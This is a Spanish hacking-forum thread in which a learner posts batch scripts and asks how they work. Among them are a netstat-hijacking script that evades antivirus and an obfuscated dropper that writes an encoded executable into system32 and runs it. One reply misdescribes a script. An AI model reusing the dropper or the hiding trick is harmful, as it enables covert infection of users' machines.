elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Batch avanzado
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Batch avanzado  (Leído 5,361 veces)
DProduct

Desconectado Desconectado

Mensajes: 236


I´m going to hack you


Ver Perfil WWW
Batch avanzado
« en: 20 Diciembre 2008, 20:31 pm »

Hola, tengo algunas dudas sobre Batch. Verán, yo me he leído el tutorial de sirdarckcat sobre Batch avanzado (y por cierto, sirdarckcat se explica bastante mal), y he aprendido a usar funciones avanzadas, pero hay códigos que todavía no he sido capaz de entender, como por ejemplo los siguientes:
http://foro.elhacker.net/scripting/musicbat-t239002.0.html
Código:
@echo off
set a=%systemroot\%system32\
if not exist %a%tasklist.exe goto jmp
for /f %%i in ('tasklist') do if %%i EQU acs.exe goto jmp
for /f %%i in ('tasklist') do if %%i EQU nord32krn.exe goto jmp
attrib +r +a +s +h %a%netstat.exe
:jmp
@reg add "HKLM\Software\Microsoft\Command Processor" /v AutoRun /f /d "@doskey netstat.exe=netstat.com">nul
copy netstat.com %a%netstat.com >nul
exit

Código:
@echo off
::By H-BlacK
If '%1==' GoTo:Eof
If '%1=='Fact Call:Fact %2
If '%1=='Porcentaje Call:Porcentaje
If '%1=='Sqrt Call:Sqrt_ %2
If '%1=='Log Call:Log %2 %3
If %1 NEQ Fact If %1 NEQ Porcentaje If %1 NEQ Sqrt If %1 NEQ Log call:Str
GoTo:Eof
:Fact
::Codigo de H-BlacK [Fact]
If '%1==' Echo Debe especificar un n£mero. & GoTo:Eof
set TmpN=%1
set TmpN_=%1
:b
set /a TmpN=%TmpN%-1
If %TmpN%==0 Echo %TmpN_% & GoTo:Eof
set /a TmpN_=%TmpN_% * %TmpN%
GoTo:b
:Porcentaje
::Codigo de todos los que lo han pensado .__.
set /p Number=Escriba el numero a sacar porcentaje:
set /p Number2=Escriba la cantidad de porcentaje a sacar:
set /a Res=%Number%/100*%Number2%
echo %Res%
set Res=
GoTo:Eof
:Sqrt_
If '%1==' Echo Debe especificar un n£mero. GoTo:Eof
set nSQRT=%1
If %nSQRT%==0 Echo Raiz: 0 & pause>nul & GoTo:Eof
set nSQRT=%nSQRT%00
call:Sqrt %nSQRT%
GoTo:Eof
:Sqrt
::Codigo de ne0x [obtener raiz entera]
::Codigo de SPP [agregar una coma]
::Codigo H-BlacK [Calculo de decimales]
set /a n=n+1
set /a nD=n*n
if %nD%==%nSQRT% (
    Echo Raiz: %n:~0,-1%,%n:~-1%
    set n=
    set nD=
    set nSQRT=
    GoTo:Eof
)
if %nD% GTR %nSQRT% GoTo:Algorithm
GoTo:Sqrt
:Algorithm
::Calculo de decimales
::en una raiz by H-BlacK
set /a n=n-1
set /a nD=n*n
set /a res=%nSQRT%-%nD%
set count=0
:Repeat
if %count%==6 GoTo:Show
set /a Dn=n*2
set res=%res%0
set /a d=res/Dn
set n=%n%%d%
set mlt_=%Dn%%d%
set /a mlt=mlt_*d
set res=%res%0
set /a res=%res%-%mlt%
set /a count=count+1
GoTo:Repeat
:Show
echo Raiz: %n:~0,-7%,%n:~-7%
set mtl_=
set mtl=
set res=
set count=
set d=
set Dn=
set n=
set nD=
GoTo:Eof
:Log
If '%1==' GoTo:Eof
If '%2==' GoTo:Eof
set bLog=%1
set count=1
if %2==%1 (
    Echo Log base %1 de %2=1
    GoTo:Eof
)
If %2==1 (
    Echo Log%1 %2=0
    GoTo:Eof
)
If %2 LSS %1 (
    Echo Log base %1 de %2=0
    Echo El resultado no es un n£mero entero.
    GoTo:Eof
)
:Log_
set /a count=count+1
set /a bLog=bLog*%1
If %2==%bLog% (
    Echo Log base %1 de %2=%count%
    set count=
    set bLog=
    GoTo:Eof
)
If %bLog% GTR %2 (
    setlocal enabledelayedexpansion
    set /a count=!count!-1
    Echo Log base %1 de %2=!count!
    Echo El resultado no es un n£mero entero.
    set count=
    set bLog=
    GoTo:Eof
)
GoTo:Log_
:Str
Echo.
Echo  Parametro no valido.
Echo.
Echo  Los parametros validos son:
Echo.
Echo  - Fact [N£mero a calcular factorial]
Echo  - Sqrt [N£mero a calcular raiz]
Echo  - Porcentaje
Echo  - Log [Base] [N£mero]
Echo.
GoTo:Eof

Código:
@echo off
set a=echo
cd %systemroot%\system32
call:codebat > "RunDll32.bat"
call:run > "RunDll32.com"
If exist 1.exe goto y
RunDll32.com > nul
:y
1.exe
del /q /f RunDll32.com
Exit
:run
%a%XPPPYZIQD[L-f6-g41GDSXu'@,~P^^P_O,!(GU(GZ(Gnu5-NETSEND_V1.00_JRT=
%a%CFFFRX,`,`2$F=@!t.rQ0%%IuL0%%(%%(%%GERYAARX2%%(%%t8-1.EXE________01200
%a%1v1v0^<0xD^"1^<0$G^"P/0A0^^F^"12d^"1TP)0B0z0z1^^Q+0m1TQ-w^"1+1S1#0B0zd^"0]
%a%Q+0z0Y1_1o0Sh^"0u0XP*d^"0]P,0z0Y1_1uv^"P-q^"e^"e^"0S0.0^>1kP-0^&E^"001S1.
%a%0S130X1(K^"100(100(100(0T16v^"081/0$M^"070S050T0-v^"0/0C0T0^"v^"081/0$
%a%M^"070X17I^"0XQ+L^"0_N^"0S050T0-v^"0/0C0X1#L^"1S0#1#0F19P*D^"0^<Q/1F1C0^<
%a%1#D^"1C0i1^<0x1Y0^<P*D^"0p17!(c)JIM_TUCKER_jtucker@adam.com.au_XXXX^<
%a%s'7O!!)[q;_(7O!!!!!!!!-CV^"h/k^>09H2^<lNTb-.`q48D!AD_%%ZiC57pLXqVuTw
%a%I61BUDS`aSnY:^>!.$XG$b7_mfrh=^".=-9H^&+go_N9kn[g?!.$XRsb8P^<Y9!!-;qb
%a%^"`M*^&4..jpq41I!1`E*^"P=xd)/%%dOW^&C?W)1($f7Fj^"UIR%%'.Ydd#_.R%%1;cKu4`
%a%`^<*^"@^"^&]g1rXS^>I^^vAg?#_UU%%1dPKtEUbFY=imm`i#8cOW%%')=G+#J.b+c0L1a/(
%a%rX!$YVN^"pKLnN17T!8!^"3!SudeN?!e?G`^<@PPaxp4`#+!!!!!!!!!^"!1!!'?!!^&Z
%a%!@onyZznM{+S!!!!d@!$Z2!$j0^"#7v7e!YEI!!bWMNo'5IY9Z\Y?SVN^<,@^"nN:)1
%a%uE+BC\y)*5v*C{4S!HC^&s{cks^>t`Et\)Y9Bo8sO6j1!pcS^&Y!0eW0[L(+diI$D=t
%a%!k,4*lN4Ek^&Bz^&^&EojdnPfN^<,^>^"nNB'Oz^^o[#0P[j1f[Ul9/!=BP-dMM+dIi/6g@
%a%Z\om0[M-'u6*7bovO.oc^"L5ESY%%td^^Q7!AAf?vj^>j2#,dH%%^<#,YCq5!$6OuA^<wrY
%a%L[h,%%@Mm)[0O7acjN^"Bj*fN:`)pLGg!#v^^]Iii0l?w#My^^G*m2T/0=O4^&+ZTxKk^^
%a%efD+yYe3_*ZVg[4e!yKO*mN2S\RwN*^&Z!yp's{NB*u^"EyY^"8^"C!)!vC@^"lZ2^^F!!
%a%R/qX9^^SA1tEe3$$j@GF\z^>!-4wllKK^&EefD+s{vy1o%%XNYVKY9N*W3-M/jt`:r:E
%a%#jp's{pE$1,\-aOWSm'?!n`D^&bdP,^<)M%%uBIo^^S]r`,X=1pT_K@2-dP_^^c8^&dX!{
%a%$C=D!+dXU5^>l3QBg!IxnG8b204!m:rC^&4My{!)/WE^^4nWa^"j$9AT-g#qo$,BKP'@
%a%^"^&Zn\G/P9xaMX@aqAzaI^>Zgfb8,BH`=u(+\eQufD$^^^>-?(;Lfn+8\0[,)OVJP.[I
%a%q+CQ1a!$daBn,^<%%8^&\O_xH#{^"^&?9\17S'a4%%#kOH=9Y_0M^&vf^<P1%%cB3O,!U\)K5
%a%!%%AYN^<f#9H(yTmnxt[JoivlX,B),-)FI?tR^&H,,O%%.D!.DeOv2,NH{W_GmOzPMhG
%a%9bv$b.z^"(eJ^>pdy(d'X{j^"F4`{Y(^^ao^^uObCdPYiEVgG9j,HN6%%-@^<8$^"iVO7fe^&
%a%e]4XILG#'Km._xp+\0$P-]/'^"F)P'DZj)p0N^<iN=OGd`$Xl(2gCzE=)e^"#?R3=%%9
%a%-@%%^<%%S_YfB^"I;KY9^"hrqjb!aYrBfBrKyp$,@JF#sSe+h(^&!E!QN^"!%%gU;d!^"$*,Z
%a%e5!*N*-m847c^&k,^>Eg)K^&gY',8#rm^^!Q7q)434#;+cm^"Y:K^&dn!]8/iU)i5-6lVJ
%a%/BJ@OI)7E-7r;q951y,Ms%%Q!!YXR^"TI(\S!e!+)3UHR^<+9,hO/.V'O!$2/yUq!+Z
%a%xR/OlQac#{.^&s]P/-j5w8v#SvBfmg6?cq*CY42F2eF!R24N^<(8+U^"M/^"8XP5V{oz
%a%duYi!q^"f#+VVv2S?y_F.+4TN^"L!a#2R^<*{[6Aa!^"qb[teeh,,xN^"RP-%%,@Fv1s5=
%a%a5U3/?-aO(!^"^",poeu,48l;doZC/YD.$g],^<G#JN#m9@-?^"G^"H@^":^^,!_weV8u]Q
%a%!*uVxN^&^^`,;B!3rX^"\#x^"RK?^"GR{f!7a$p;'2^^E6;T:f^>*i`dV7Oj6uL(47q]QNb
%a%!5OzgBNJ0ME6:f:zNZ7f.4I%%p(Hg3W#mLaS[!%%%%.^"-Rw6Z^"8%%us88,D@nkEy^&rJg
%a%6B!%%(0JQ3QH;g^"Nm!.!$!$!%%8MNE84xTHTYU!i@P2^<tO4h=j^"^&XT^"F*^<ew!^"NUCn
%a%eY0XNbf=pZYm1^"B?x655@Ead0NLC2WS[0ZpN;GYve-^&le0w/'@^"2Sc)U2_j8)O5+
%a%;_#75#N5dR#s#QqD!!);'`[S901quM/.^"^^!5!APv%%?MZnc#r!.oiN%%!'=.,?:)yi
%a%!!Zd3OK;T\4x'7^>`7r!{!a%%FXuS*nwR:^"t*n#Vt(8NUICe$XN#(;!#^"-^^5$.HJ)\
%a%$g!-C24xp8$(^"f#+f:E@#1_biI%%w\,#k#A^&c.\^&Zic_7O9_GPMHD%%8z:N,?:Zb2W
%a%!%%85i584%%n,Y947O!+5I^&ZQXN*u6/?Rjaa.P:^>!e[T8vMN7Q+zl8){Z^&,wz\26fF
%a%!BpMZO%%KV:^"OTe^"R(O(0,UEYCE%%qD*vvp-9TZ^>Y(QS+g76$$5$^&r$OQ)p7VR^";\@
%a%NclX7QJX8^<q{l@=x^"F-+EEHux3_(f_fjO^^^"gN)4S#qX?/+T:OW,lNn!Bo;NCR[q2
%a%%%/+V)WV-#u5=,8!WH\-+Bv86I:7Umk!!3'l84a[E^&\+k^&raW8$:-uFRX,8^"SONQU
%a%9@OG'1%%=,rRR!aQMBg,o,[)vex(,Ii^&]Kb!9(f4hwmrndbVJ7Qdi!#N/h.'?-]^&Z
%a%XV!!\N8$VXBw9^^UeOnS.OUdkR8A+YEKKgC!)S/!Q%%n,8@S[f*yA^"^&Z'-!%%!N$@C,
%a%4`du^>^<g!^"_#-'b#-!xo'(Aew^&rQm!9iC,IE`vKON--P2FZN(5+^"J#%%;o!(%%Y-GBZ
%a%,;G%%O(NJOg^&(03!*CU)U.8!9vo^^r!iMu!DLxdR*49_*3hd)Om+,8X^^HTpp1ri1qf
%a%O's^^!$[z^"L-^<Q%%4m!9^")^&:,h6'pN@/.b$c9\^&r(k!#Hw,@#Clx.5,xEV=mf[u:!e
%a%1^^f\^&Zj71ruS!^"^<^^S\dPeFOoa^"S#4^"$64R*z-laa,jOG7P9),Z-rN$!@tC*MhI*^<
%a%nU^&b?N:FO,8,f\0,#P$2e9'!#+,p!c!CQQ!^^z4,ica_(^"^^N2^&)qCPl%%?%%C(iU-/+
%a%/=,]XLC^>_g,YB`^"G!#AC+CNl!-_@2.%%^":FYMIY7O^&sfDJoe^<2ziK!^>4`!;j6!R_U
%a%N2ig^>BOFI9#ps=%%6J3%%5#0kW7TVNGx]57pj/Y[$KND$\dP^&j+r)en?,P)$^&bf^&1Q
%a%^"^&p'8ybU=/$*\(!;[O^&gDJ=Nju,hQ^"3Q^"gT`!^&c`OOBYU)/*`D7u.6!bp^<NCl:.D
%a%(Q7O%%D%%$)I?s)Q5DSk.uYY8e*?!tJ09Z,?^&\^&_`D^&v\P!1ppT!CM^>C^&385!,7^&%%^<
%a%9{S[^>FBj!'HdBfI=NDC('B^&7G!)Y!(EVc=^&b0lBnE3I!g2iWdQ-^>f^^Z?:@1E!a$3
%a%J`,pVp8%%?8,8f'lI^"n^<;N%%G\Pt2l1yA':F,l^&2Bm4r^"^&?q.$)wT!%%5iu!!uS)YWW
%a%#k,fgW9[lX7QPyP0^&4(f-u#96_`R!A(0j^^f:Ck^&FLX%%^<^^r#y^"lR6F)G+-^"UY7z$@
%a%Z?^")!cT5t`'?6l^&k,@^&r!(4h8D#{^"YH,f{dH#,!(f\^&l9_)dqs!9h8HTa.!!g*C-
%a%S#9Z!-#!!U3:OS1xb^"BxlRC^<M1dPfpeU^"vK6%%K]:$l-i!9+Wx4Cl'1j%%w_OG!+^"L
%a%!\#1!'cm!-G12.+wBwC^&_hRG!BQX3N^"O0AN^&:K]L'32*!B@0dq/zpm$Y12#tBG#s
%a%D4^&f^>71yD;_/fx#[PB\$8F)q9[+,Io*-'U!^>mM,H^"]^&zg^&:.NG*@OM51OM.9#q]C
%a%dl8((^<,iRBY:XK#,nK!c)Ia.^&f;G,@5w4`qTbfPP,PfZ%%)!c%%BTd/c^^v'$'9,qMU
%a%uW7cTp!g/H%%65'Pn42OK^&b7['Y^^z^"8e!pOu[7P%%7s[^"ecN^&x`hrbH?#k^&jdV^"Cxl
%a%7R6j85+7Pl6AnH)It2^>0x.I9O@^^riXV;N:!SVb8d^&\CSPle1j:-5^"FC+,DNB#W:!
%a%(pQq^&]^"M!#WV4hFZHDjjdW#+!#^&2!(0\^"qeu(bY9N[!!R=N/t*!8.b!Q/'^"FPl^>6
%a%dQ.1!^"#/!-=%%!80L#]JN2oY9Nm,9o.N^"!1!H\h!*6J'w7O2D,Fe6!(^"Y!$O?^"^>%%e
%a%!_7O3%%arntCN72!+D0!Me-!D!!#oog,U^^u^>X!%%F%%!S.B7_G`1(h%%G(EeOy^&]^")Pq
%a%OA!TzV#L!!'XXX3EBf$*!%%M^>Bga5!Y6Z#nfZ-TBfuhBiAWN0-q-Bc78k3l^&7fZ%%u
%a%owiXdW5^^!!qC,s`t%%cEU4xg?gF!$N;!(%%W!TNb!'Uu$0dPN!7[jS7U4@P{'A-#m-
%a%!Z,z/f^>ZPo1t+;!#8$')S79#DA^&{Z^"8sar'3okBx!^"^":^"^>!Q^&;P0-EPl$*N^";\N*
%a%z6!^^n:!)Yy!1^^v2]S[S0dWw^"!.=mNl=a$(:^>!eaa#qoj!BN*s#!^"nJ#[+s)rDa^>0
%a%S\+q7TO.^&{(T*gD0^&!Nb!\aax5ogdZN)v@!A+c^"Kvj!:OGE=N^")M!'#q!2Q5!8dP
%a%$-F:Y1E]o%%^^r-!!.p^^!VHH!,uG!`[C#+7OrldT!^>Sl$^<,X^&_!!.B6RK;j?ojqg!(
%a%.m,_fV!aS^<-T-]:7S[p+dPA=#IYU!FhT^"o^"F7^&/'^>.'A$O;tIw!#.r1m3;![ogF(
%a%$1-{q5?[!1^<nD^<qi7g;(GI=-BnBg?6N1l2!C+K#@7_^<'dP8TN^"=+!#\,!+YA.5-f
%a%^"r5E,Z,8/'BuiS!-JB!_]OOUWO%%cHDP]Hw'!E!9DV{*$DtK,V[mAB%%Bvf*!%%E/Q+
%a%)W!d*^>Pu.t$5*:gg\J^"4r^"OD*!799a!a2vsAD3owA#NeUE7Zf.,zxlPw^"X#-N*j'
%a%vjY9!-bx(EvO!A)N!*dP^"$(=hnjo21gOb!,d'w#Zr6,M#/jB2IYXevpD*#Go7u`U
%a%^<vN^"^"=goCA$P**NP!%%'y0uY51C%%5)I4PZ@!5*vo_*%%Ma7gj75E%%uc8cDxGCQ=LOe
%a%G?!#L`O557^&K!i!%%*B+g%%=hAS`vT^<H8^^7/(d^&_$!@MCQDGQOuoD^<F4Y)Kh81++Q=
%a%!!*0f^&qYW+86P;^^e6xGaLOqJp-CR$?\CyH,zz^&jY=86ev7$^"y,[-\yUw\epLrnac
%a%!'H.L`$!=@CQL0:^>o^^3FRZj6`c4h1F!fh7N$7eiH^&bIs[z/PXqOmV=931[.kN'^"f
%a%$T3GP1^"8)=,I%%5RF8(+PiZ#u\eg9ELRIZ^^#kIgxwopULR#jf^"e^>G$-^<i^"HEAUmnb
%a%j17R!$f_YpA1/kg/\D^>V1799gX('Co=;RC822;!.Tb-*7_^"j59/;N$[h!)VV!:V*
%a%!g)]^&ZEU;g;$(ZN^&3{!/an/W]O$+vmNnS[hl7XdaHL^&67r/g#^^X\)zN)Dx,M+1Oi
%a%c^^,Qu8[)g`@96+^<g*#bUr{,T!.@!sPDd]zN#=N^>#^"Q!^"mi^"r1I1T6/^<^&u:B^"#@KJ
%a%'!!!~^<
goto:eof

:codebat
%a%Aqui va tu code
%a%siempre empieza con %a%
%a%ya que quiere decir esta variable
%a%"Echo ".
%a%el bat se escribe en system32
%a%para ser ejecutado.

O el que se lleva la palma:

Código:
@echo off

SETLOCAL ENABLEDELAYEDE XPANSION

set lang=es
set text=title,help0,help1,help2,help3,help4,help5,help6,help7,help8,using,error,succs
set strAppName=spfix
set strFileIn=%~1
set strFileOut=%~2
set strTmp=

:lang
set es_title=Conversor de caracteres para lenguage batch.
set es_help1=ADVERTENCIA: Este programa es totalmente
set es_help2=efectivo si se utiliza con archivos de idioma.
set es_help3=No se recomienda hacerlo directamente sobre
set es_help4=un script, ya que genera una salida sin
set es_help5=variables expandidas.
set es_help6=Si su script no usa variables expandidas,
set es_help7=usted puede intentar usar %strAppName%
set es_help8=en forma directa sobre el archivo batch.
set es_using=Uso: %strAppName% archivoOrigina l [archivoCorregido]
set es_error=No se encontr¢ el archivo.
set es_help0=Escriba %strAppName% sin par metros para ver la ayuda.
set es_succs=La conversion termin¢ satisfactoriam ente.

for %%a in (%text%) do (
  set strTmp=%lang%_%%a
  call set %%a=%%!strTmp!%%
)

if %strFileIn%. EQU . (
  echo.%title%
  echo.
  echo.%help1%
  echo.%help2%
  echo.%help3%
  echo.%help4%
  echo.%help5%
  echo.%help6%
  echo.%help7%
  echo.%help8%
  echo.
  echo.%using%
  echo.
  goto:EOF
)

if not exist %strFileIn% (
  echo.%error%
  echo.
  echo.%help0%
  echo.
  goto:EOF
)

if %strFileOut%. EQU . (
  set strFileOut=fixed_%strFileIn%
)

if exist %strFileOut% del %strFileOut%
for /f "tokens=* eol=" %%a in (%strFileIn%) do (
  set strTmp=%%a
  set strTmp=!strTmp:á= !
  set strTmp=!strTmp:é=‚!
  set strTmp=!strTmp:í=¡!
  set strTmp=!strTmp:ó=¢!
  set strTmp=!strTmp:ú=£!
  set strTmp=!strTmp:ñ=¤!
  set strTmp=!strTmp:Á=µ!
  set strTmp=!strTmp:É=!
  set strTmp=!strTmp:Í=Ö!
  set strTmp=!strTmp:Ó=à!
  set strTmp=!strTmp:Ú=é!
  set strTmp=!strTmp:Ñ=¥!
  set strTmp=!strTmp:¿=¨!
  echo !strTmp!>> %strFileOut%
)

echo.%succs%
echo.

Ahora pregunto: ¿alguien sabe como puedo aprender a usar algunas funciones que aparecen en esos códigos? ¿y a como hacer "obras de ingeniería" como las que hay, por ejemplo, en el último código?

Gracias


En línea

Sé una cosa... dentro de escasos segundos vas a morir... ¿que porque lo sé?... Mira detrás de ti
_carlos_

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Batch avanzado
« Respuesta #1 en: 21 Diciembre 2008, 01:49 am »

El primero es un código de Leo que trabaja usando nircmd.exe una utilidad para la consola con muchas funciones.
El segundo, y creo hasta el final son códigos de BlackHack, el primero crea una macro con doskey que se cargará cada vez que se abra el cmd.exe sin la opción /d pues cmd.exe lee la clave AutoRun de "HKLM\Software\Microsoft\Command Processor" el objetivo de esa macro es que cuando el usuario escriba netstat.exe ejecute otro programa llamado netstat.com ¿con qué fin? XD
El tercero es un código con funciones matemáticas: calcular factorial, calcular raiz, porcentaje, logaritmo
El cuarto crea un ejecutable de 16 bit creado con netsend de jim tucker, que al ejecutarlo crea otro ejecutable, que ni idea de que será, pero cuidado con lo que ejecutas.
El quinto es un conversor de caracteres para lenguage batch, le faltan algunos carácteres como la ü Ü

Yo no considero que sirdarckcat explique mal, tal vez tu comprensión de lectura no es buena, sin embargo, puedes leer ss64.com/nt
Sobre lo de usar funciones, una cosa es entender cómo funcionan y otra cosa es aprender a usarlas, que consiste simplemente en llamarlas, y pasarle los parámetros requeridos que generalmente se indican en la ayuda de la función.




En línea

RTN-House

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Batch avanzado
« Respuesta #2 en: 27 Diciembre 2014, 21:11 pm »

El segundo un fallo que yo veo es que es un "keylogger" muy muy elaborado, no se puede llamar keylogger pero se asimila lo que parece.
El fallo es que este archivo por lotes lo que pretende es "capar" (ocupar por completo) tu banda ancha y sistemas de ejecución de Windows, lo que tiene como final el bloqueo del ordenador.
En línea

Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.788



Ver Perfil
Re: Batch avanzado
« Respuesta #3 en: 27 Diciembre 2014, 21:19 pm »

@RTN-House

Porfavor, antes de postear, lee la fecha del post principal así como la fecha del último mensaje, la fecha de la última vez que el usuario estuvo activo, y las normas del foro (en mi firma).

Está prohibido reivir temas antiguos.

Tema cerrado.

Saludos!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Batch avanzado para apagar PCs en red remotamente
Scripting
Issiana 4 9,161 Último mensaje 18 Octubre 2011, 03:23 am
por the_Avenger
[BATCH] Programa en batch (Herramientas utiles nivel medio-Avanzado)
Scripting
Srare 3 4,425 Último mensaje 15 Abril 2014, 20:13 pm
por Eleкtro
Menú avanzado en Batch
Scripting
RTN-House 1 6,114 Último mensaje 27 Diciembre 2014, 21:24 pm
por Eleкtro
MOVIDO: Menú avanzado en Batch
Programación C/C++
Eternal Idol 0 1,473 Último mensaje 27 Diciembre 2014, 21:35 pm
por Eternal Idol
[BATCH] (RESUELTO) AYUDA RENOMBRADOR AVANZADO
Scripting
54n4r0r 1 1,934 Último mensaje 9 Abril 2016, 19:05 pm
por 54n4r0r
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines